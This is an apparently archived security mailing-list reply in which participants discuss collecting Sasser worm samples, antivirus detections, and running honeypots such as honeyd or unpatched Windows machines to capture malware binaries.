Re: Wanted: Sasser executable and derivatives

[Steve Kudlak <chromazine () sbcglobal net>]

I look at what my antivirus things catch and what sentinare catches on
my formal account. Sentinare is pretty good with all this stuff. I have
not seen Sasser. I have seen Swen and BAGLE and IRCBOT.
The IRCBots stopped when I turnd off sharing on pretty much everything.
I was sharing files between my main Win2k machine and the virtua;
Red Hat Linux I have been working with.

Have Fun,
Sends Steve


James Riden wrote:

> Syke <syke () mantissecurity net> writes:
>
>
>  
>
> >  Wouldn't it be easier to use honeyd(www.honeyd.org) with an LSASS or
> > mydoom script? That way you can just check the logs for the binaries
> > that were uploaded?
> >    
>
> Yes, because you'll get an awful lot more than Sasser if you put an
> unpatched Win32 machine on the 'net. Even if you just leave off the
> MS04-011 patch, you could get other things, such as Korgo and Agobot
> variants IIRC.
>
> cheers,
> Jamie
>